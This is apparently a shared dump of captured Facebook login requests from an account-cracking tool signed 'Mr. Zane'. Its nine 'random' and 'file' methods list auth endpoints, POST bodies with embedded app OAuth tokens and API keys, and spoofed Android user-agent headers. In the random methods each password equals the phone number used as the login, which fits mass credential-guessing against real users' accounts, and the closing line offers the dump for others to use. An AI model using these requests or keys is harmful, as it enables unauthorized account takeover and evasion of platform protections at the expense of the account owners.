(-) CAPTURED BY MR. ZANE

(-) RANDOM METHOD 1

ZANE URL : https://b-graph.facebook.com/auth/login
---------------------------------------------
ZANE DATA : {'adid': 'd7eF0844ebFd2A57', 'format': 'json', 'device_id': 'd4294ec5-a268-404d-8ecc-5420af627ec0', 'email': '01728995461', 'password': '01728995461', 'generate_analytics_claims': '1', 'credentials_type': 'password', 'source': 'login', 'error_detail_type': 'button_with_disabled', 'enroll_misauth': 'false', 'generate_session_cookies': '1', 'generate_machine_id': '1', 'fb_api_req_friendly_name': 'authenticate'}
---------------------------------------------
ZANE HEADER : {'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive', 'User-Agent': '[FBAN/FB4A;FBAV/93.0.0.5407;FBBV/5310001;[FBAN/FB4A;FBAV/125.0.0.3.69;FBBV/39224398;FBDM/{density=2.75,width=720,height=1080};FBLC/en_PK;FBRV/314092005;FBCR/Vi India;FBMF/HUAWEI;FBBD/HUAWEI;FBPN/com.facebook.katana;FBDV/ HRY-LX1;FBSV/9.1.1;FBOP/1;FBCA/armeabi-v7a:armeabi;]', 'Authorization': 'OAuth 350685531728|62f8ce9f74b12f84c123cc23437a4a32', 'X-FB-Friendly-Name': 'authenticate', 'X-FB-Connection-Type': 'unknown', 'Content-Type': 'application/x-www-form-urlencoded', 'X-FB-HTTP-Engine': 'Liger', 'Content-Length': '329'}

(-) RANDOM METHOD 2

ZANE URL : https://api.facebook.com/auth/login
---------------------------------------------
ZANE DATA : {'adid': '48751963-7413-4615-87f2-22df92e6b3cd', 'format': 'json', 'device_id': 'd4b4e2f6-5a25-4218-8389-db44e9c617f5', 'email': '01728448504', 'password': '01728448504', 'generate_analytics_claims': '1', 'community_id': '', 'cpl': 'true', 'try_num': '1', 'family_device_id': '2f2056c7-c2e6-420b-abd3-8cf54dd2a5bb', 'credentials_type': 'password', 'source': 'login', 'error_detail_type': 'button_with_disabled', 'enroll_misauth': 'false', 'generate_session_cookies': '1', 'generate_machine_id': '1', 'currently_logged_in_userid': '0', 'locale': 'en_GB', 'client_country_code': 'GB', 'fb_api_req_friendly_name': 'authenticate', 'api_key': '62f8ce9f74b12f84c123cc23437a4a32', 'access_token': '350685531728|62f8ce9f74b12f84c123cc23437a4a32'}
---------------------------------------------
ZANE HEADER : {'User-Agent': 'Davik/2.1.0 (Linux; U; Android 11.3.4; HUAWEI LYO-L21 Build/OPR6.686392.481) [FBAN/FB4A;FBAV/351.0.0.28.45;FBBV/16724348;FBDM/{density=2.5,width=720,height=2168};FBLC/lt_LT;FBRV/590775288;FBCR/CoopVoce;FBMF/HUAWEI;FBBD/HUAWEI;FBPN/com.facebook.katana;FBDV/HUAWEI LYO-L21;FBSV/11.3.4;FBOP/1;FBCA/arm64-v8a:;]', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'Keep-Alive', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': 'graph.facebook.com', 'X-FB-Net-HNI': '20105', 'X-FB-SIM-HNI': '33990', 'Authorization': 'OAuth 350685531728|62f8ce9f74b12f84c123cc23437a4a32', 'X-FB-Connection-Type': 'MOBILE.LTE', 'X-Tigon-Is-Retry': 'False', 'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=62f8ce9f74b12f84c123cc23437a4a32', 'x-fb-device-group': '5120', 'X-FB-Friendly-Name': 'ViewerReactionsMutation', 'X-FB-Request-Analytics-Tags': 'graphservice', 'X-FB-HTTP-Engine': 'Liger', 'X-FB-Client-IP': 'True', 'X-FB-Server-Cluster': 'True', 'x-fb-connection-token': '62f8ce9f74b12f84c123cc23437a4a32'}

(-) RANDOM METHOD 3

ZANE URL : https://api.facebook.com/method/auth.login
---------------------------------------------
ZANE DATA : {'adid': 'e491aec2-80f7-482e-84f8-a73e370b504b', 'format': 'json', 'device_id': 'f1621629-e620-4827-9065-d37e2e711521', 'email': '01728602477', 'password': '01728602477', 'generate_analytics_claims': '1', 'community_id': '', 'cpl': 'true', 'try_num': '1', 'family_device_id': '59bdd6f0-09d1-484f-90cf-cf866c2f38b9', 'credentials_type': 'password', 'source': 'login', 'error_detail_type': 'button_with_disabled', 'enroll_misauth': 'false', 'generate_session_cookies': '1', 'generate_machine_id': '1', 'currently_logged_in_userid': '0', 'locale': 'en_GB', 'client_country_code': 'GB', 'fb_api_req_friendly_name': 'authenticate'}
--------------------------------------------- 
ZANE HEADER : {'User-Agent': 'Davik/2.1.0 (Linux; U; Android 4.1.5; SNE-LX2 Build/SP1A.164106.818) [FBAN/FB4A;FBAV/371.0.0.30.113;FBBV/12050159;FBDM/{density=3.0,width=720,height=2134};FBLC/nl_NL;FBRV/285032787;FBCR/Oskarta;FBMF/HUAWEI;FBBD/HUAWEI;FBPN/com.facebook.katana;FBDV/SNE-LX2;FBSV/4.1.5;FBOP/1;FBCA/arm64-v8a:;]', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive', 'Authorization': 'OAuth 350685531728|62f8ce9f74b12f84c123cc23437a4a32', 'X-FB-Friendly-Name': 'authenticate', 'X-FB-Connection-Bandwidth': '21451', 'X-FB-Net-HNI': '23376', 'X-FB-SIM-HNI': '31067', 'X-FB-Connection-Type': 'unknown', 'Content-Type': 'application/x-www-form-urlencoded', 'X-FB-HTTP-Engine': 'Liger'} 

(-) RANDOM METHOD 4

ZANE URL : https://api.facebook.com/auth/login
---------------------------------------------
ZANE DATA : {'adid': '8884856e-ee60-4120-9940-2493f53696b7', 'format': 'json', 'device_id': '141b5736-e669-44f9-8df0-66d50b5af57a', 'email': '01928473262', 'password': '01928473262', 'generate_analytics_claims': '1', 'community_id': '', 'cpl': 'true', 'try_num': '1', 'family_device_id': 'ed737fba-666f-469b-a4cb-c4e6066f19b1', 'credentials_type': 'password', 'source': 'login', 'error_detail_type': 'button_with_disabled', 'enroll_misauth': 'false', 'generate_session_cookies': '1', 'generate_machine_id': '1', 'currently_logged_in_userid': '0', 'locale': 'en_GB', 'client_country_code': 'GB', 'fb_api_req_friendly_name': 'authenticate', 'api_key': '62f8ce9f74b12f84c123cc23437a4a32', 'access_token': '350685531728|62f8ce9f74b12f84c123cc23437a4a32'}
---------------------------------------------
ZANE HEADER : {'User-Agent': '[FBAN/FB4A;FBAV/83.0.0.6258;FBBV/9536770;[FBAN/FB4A;FBAV/134.0.0.4.11;FBBV/59509642;FBDM/{density=2.8812501,width=1080,height=1344};FBLC/hi_IN;FBRV/636634142;FBCR/Tele2You;FBMF/HUAWEI;FBBD/HUAWEI;FBPN/com.facebook.katana;FBDV/HUAWEI VNS-L21;FBSV/4.5.5;FBOP/1;FBCA/armeabi-v7a:armeabi;]', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'Keep-Alive', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': 'graph.facebook.com', 'X-FB-Net-HNI': '33964', 'X-FB-SIM-HNI': '30453', 'Authorization': 'OAuth 350685531728|62f8ce9f74b12f84c123cc23437a4a32', 'X-FB-Connection-Type': 'MOBILE.LTE', 'X-Tigon-Is-Retry': 'False', 'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=62f8ce9f74b12f84c123cc23437a4a32', 'x-fb-device-group': '5120', 'X-FB-Friendly-Name': 'ViewerReactionsMutation', 'X-FB-Request-Analytics-Tags': 'graphservice', 'X-FB-HTTP-Engine': 'Liger', 'X-FB-Client-IP': 'True', 'X-FB-Server-Cluster': 'True', 'x-fb-connection-token': '62f8ce9f74b12f84c123cc23437a4a32'}

(-) RANDOM METHOD 5

ZANE URL : https://mbasic.facebook.com/login/device-based/login/async/?refsrc=deprecated&lwv=100 
--------------------------------------------- 
ZANE DATA : {'m_ts': '1713513406', 'li': 'viMiZpikdi4AsP7077KchRJF', 'try_number': 0, 'unrecognized_tries': 0, 'email': '01746588034', 'prefill_contact_point': '01746588034', 'prefill_source': 'browser_dropdown', 'prefill_type': 'contact_point', 'first_prefill_source': 'browser_dropdown', 'first_prefill_type': 'contact_point', 'had_cp_prefilled': True, 'had_password_prefilled': False, 'is_smart_lock': False, 'bi_xrwh': 0, 'encpass': '#PWD_BROWSER:0:1713513406:01746588034', 'bi_wvdp': '{"hwc":true,"hwcr":false,"has_dnt":true,"has_standalone":false,"wnd_toStr_toStr":"function toString() { [native code] }","hasPerm":true,"permission_query_toString":"function query() { [native code] }","permission_query_toString_toString":"function toString() { [native code] }","has_seWo":true,"has_meDe":true,"has_creds":true,"has_hwi_bt":false,"has_agjsi":false,"iframeProto":"function get contentWindow() { [native code] }","remap":false,"iframeData":{"hwc":true,"hwcr":false,"has_dnt":true,"has_standalone":false,"wnd_toStr_toStr":"function toString() { [native code] }","hasPerm":true,"permission_query_toString":"function query() { [native code] }","permission_query_toString_toString":"function toString() { [native code] }","has_seWo":true,"has_meDe":true,"has_creds":true,"has_hwi_bt":false,"has_agjsi":false}}', 'jazoest': '2877', 'lsd': 'AVqAZHOK9Dk'}
---------------------------------------------
ZANE HEADER : {'Host': 'mbasic.facebook.com', 'content-length': '18', 'sec-ch-ua': '"Not_A Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"', 'sec-ch-ua-mobile': '?1', 'user-agent': 'Mozilla/5.0 (Linux; U; Android 10.2.3; SM-A013F Build/SKQ1.210216.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/117.0.4781.142 Mobile Safari/537.36 OPR/62.4.2254.61190|"Not:A-Brand";v="99", "Chromium";v="98"|11|98.0.4758.101', 'x-response-format': 'JSONStream', 'content-type': 'application/x-www-form-urlencoded', 'x-fb-lsd': 'AVrxkYI1_Ac', 'viewport-width': '360', 'x-requested-with': 'XMLHttpRequest', 'x-asbd-id': '129477', 'dpr': '2', 'sec-ch-prefers-color-scheme': 'light', 'sec-ch-ua-platform': '"Android"', 'accept': '*/*', 'origin': 'https://mbasic.facebook.com', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'cors', 'sec-fetch-dest': 'empty', 'referer': 'https://mbasic.facebook.com/login/?next&ref=dbl&fl&login_from_aymh=1&refid=8', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'} 

(-) FILE METHOD 1

ZANE URL : https://api.facebook.com/auth/login
---------------------------------------------
ZANE DATA : {'adid': 'ea4b999b-766e-4f49-8f9d-e6f2cd1c89c9', 'format': 'json', 'device_id': 'f2602119-554f-46df-9afd-b1f32074b464', 'cpl': 'true', 'family_device_id': 'fe418585-8cc9-4cd3-9658-55063aa5268d', 'credentials_type': 'device_based_login_password', 'error_detail_type': 'button_with_disabled', 'source': 'device_based_login', 'email': 'FUCK BY', 'password': 'MR.ZANE', 'access_token': '350685531728|62f8ce9f74b12f84c123cc23437a4a32', 'generate_session_cookies': '1', 'meta_inf_fbmeta': '', 'advertiser_id': 'c4c9fc12-f8f2-44e1-8cb6-5085accb2025', 'currently_logged_in_userid': '0', 'locale': 'en_US', 'client_country_code': 'US', 'method': 'auth.login', 'fb_api_req_friendly_name': 'authenticate', 'fb_api_caller_class': 'com.facebook.account.login.protocol.Fb4aAuthHandler', 'api_key': '882a8490361da98702bf97a021ddc14d'}
---------------------------------------------
ZANE HEADER : {'Content-Type': 'application/x-www-form-urlencoded', 'Host': 'graph.facebook.com', 'User-Agent': 'Davik/2.1.0 (Linux; U; Android 7.3.2; FIG-LX1 Build/OPR6.367053.568) [FBAN/FB4A;FBAV/135.0.0.3.73;FBBV/38250836;FBDM/{density=2.5,width=720,height=2110};FBLC/hi_IN;FBRV/514888044;FBCR/Banglalink;FBMF/HUAWEI;FBBD/HUAWEI;FBPN/com.facebook.katana;FBDV/FIG-LX1;FBSV/7.3.2;FBOP/1;FBCA/arm64-v8a:;]', 'X-FB-Net-HNI': '45204', 'X-FB-SIM-HNI': '45201', 'X-FB-Connection-Type': 'MOBILE.LTE', 'X-Tigon-Is-Retry': 'False', 'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62', 'x-fb-device-group': '5120', 'X-FB-Friendly-Name': 'ViewerReactionsMutation', 'X-FB-Request-Analytics-Tags': 'graphservice', 'Accept-Encoding': 'gzip, deflate', 'X-FB-HTTP-Engine': 'Liger', 'X-FB-Client-IP': 'True', 'X-FB-Server-Cluster': 'True', 'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62', 'Connection': 'Keep-Alive'}

(-) FILE METHOD 2

ZANE URL : https://b-graph.facebook.com/auth/login
---------------------------------------------
ZANE DATA : {'adid': '3e0B4B6AAA4FF634', 'format': 'json', 'device_id': '190a779b-a40c-422b-a5eb-4b7b101b2f60', 'email': 'FUCK BY', 'password': 'MR. ZANE', 'generate_analytics_claims': '1', 'credentials_type': 'password', 'source': 'login', 'error_detail_type': 'button_with_disabled', 'enroll_misauth': 'false', 'generate_session_cookies': '1', 'generate_machine_id': '1', 'fb_api_req_friendly_name': 'authenticate'}
---------------------------------------------
ZANE HEADER : {'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive', 'User-Agent': 'Davik/2.1.0 (Linux; U; Android 6.4.2; HUAWEI G610-U15 Build/QP1A.581184.193) [FBAN/Orca-Android;FBAV/105.0.0.32.67;FBPN/com.facebook.orca;FBLC/en_PK;FBBV/47463576;FBCR/altice MEO;FBMF/HUAWEI;FBBD/HUAWEI;FBDV/HUAWEI G610-U15;FBSV/6.4.2;FBCA/arm64-v8a:null;FBDM/{density=1.5,width=1280,height=2150};FB_FW/1;]', 'Authorization': 'OAuth 350685531728|62f8ce9f74b12f84c123cc23437a4a32', 'X-FB-Friendly-Name': 'authenticate', 'X-FB-Connection-Type': 'unknown', 'Content-Type': 'application/x-www-form-urlencoded', 'X-FB-HTTP-Engine': 'Liger', 'Content-Length': '329'}

(-) FILE METHOD 3

ZANE URL : https://graph.facebook.com/auth/login
---------------------------------------------
ZANE DATA : {'access_token': '6628568379|c1e620fa708a1d5696fb991c1bde5662', 'sdk_version': {15}, 'email': 'FUCK BY', 'password': 'MR. ZANE', 'sdk': 'android', 'locale': 'en_US', 'generate_session_cookies': '1', 'sig': 'c1e620fa708a1d5696fb991c1bde5662'}
---------------------------------------------
ZANE HEADER : {'Host': 'graph.facebook.com', 'x-fb-connection-bandwidth': '21633794', 'x-fb-sim-hni': '37891', 'x-fb-net-hni': '30950', 'x-fb-connection-quality': 'EXCELLENT', 'user-agent': 'Davik/2.1.0 (Linux; U; Android 12.1.2;  HRY-LX1 Build/RP1A.683561.780) [FBAN/FB4A;FBAV/169.0.0.32.123;FBBV/30143173;FBDM/{density=2.8812501,width=720,height=1080};FBLC/pl_PL;FBRV/921642354;FBCR/Movistar;FBMF/HUAWEI;FBBD/HUAWEI;FBPN/com.facebook.katana;FBDV/ HRY-LX1;FBSV/12.1.2;FBOP/1;FBCA/arm64-v8a:;]', 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}

(-) FILE METHOD 4

ZANE URL : https://api.facebook.com/auth/login 
---------------------------------------------
ZANE DATA : {'adid': 'bB8b4c8faC3D1fdE', 'format': 'json', 'device_id': 'faddcbc1-7bbd-4630-b4ae-d65985dbdc16', 'cpl': 'true', 'family_device_id': '396af66a-86aa-4b5f-b8b8-0709587db46a', 'credentials_type': 'device_based_login_password', 'error_detail_type': 'button_with_disabled', 'source': 'device_based_login', 'email': 'FUCK BY', 'password': 'MR. ZANE', 'access_token': '350685531728|62f8ce9f74b12f84c123cc23437a4a32', 'generate_session_cookies': '1', 'meta_inf_fbmeta': '', 'advertiser_id': '8b59ed89-4b88-4f69-a1ed-dfea59e76839', 'currently_logged_in_userid': '0', 'locale': 'en_US', 'client_country_code': 'US', 'method': 'auth.login', 'fb_api_req_friendly_name': 'authenticate', 'fb_api_caller_class': 'com.facebook.account.login.protocol.Fb4aAuthHandler', 'api_key': '882a8490361da98702bf97a021ddc14d'}
---------------------------------------------
ZANE HEADER : {'User-Agent': 'Davik/2.1.0 (Linux; U; Android 7.3.2; VIE-L09 Build/TP2A.499907.650) [FBAN/Orca-Android;FBAV/151.0.0.22.138;FBPN/com.facebook.orca;FBLC/es_ES;FBBV/11432861;FBCR/Vodafone;FBMF/HUAWEI;FBBD/HUAWEI;FBDV/VIE-L09;FBSV/7.3.2;FBCA/arm64-v8a:null;FBDM/{density=2.75,width=1280,height=1344};FB_FW/1;]', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': 'graph.facebook.com', 'X-FB-Net-HNI': '39770201', 'X-FB-SIM-HNI': '24554', 'X-FB-Connection-Type': 'MOBILE.LTE', 'X-Tigon-Is-Retry': 'False', 'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62', 'x-fb-device-group': '5120', 'X-FB-Friendly-Name': 'ViewerReactionsMutation', 'X-FB-Request-Analytics-Tags': 'graphservice', 'X-FB-HTTP-Engine': 'Liger', 'X-FB-Client-IP': 'True', 'X-FB-Server-Cluster': 'True', 'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62', 'Content-Length': '706'}

(-) ENJOY EVERYONE ⚡
